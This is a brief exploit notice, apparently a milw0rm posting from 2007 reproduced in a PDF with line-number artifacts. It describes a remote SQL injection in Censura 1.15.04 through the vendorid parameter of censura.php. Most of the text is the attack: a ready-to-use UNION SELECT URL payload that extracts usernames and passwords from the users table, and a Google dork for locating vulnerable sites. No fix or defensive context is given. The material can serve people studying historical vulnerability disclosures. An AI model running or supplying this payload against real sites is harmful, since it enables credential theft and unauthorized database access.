Censura 1.15.04 censura.php vendorid SQL Injection Vulnerability.pdf

1 ============================================== 2 3 Censura v1.15.04 (vendorid) Remote SQL Injection 4 5 ============================================== 6 7 Found: Cyber−Security.org 8 9 ============================================== 10 11 Exploit: 12 censura.php?cmd=vendor_info&vendorid=−1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/ from/**/users/**/ 13 14 ============================================== 15 16 google dork: "Powered by: Censura" 17 18 vendor: http://www.censura.info/ 19 20 ============================================== 21 22 # milw0rm.com [2007−05−03] Page 1/1 Censura 1.15.04 censura.php vendorid SQL Injection Vulnerability xoron 05/03/2007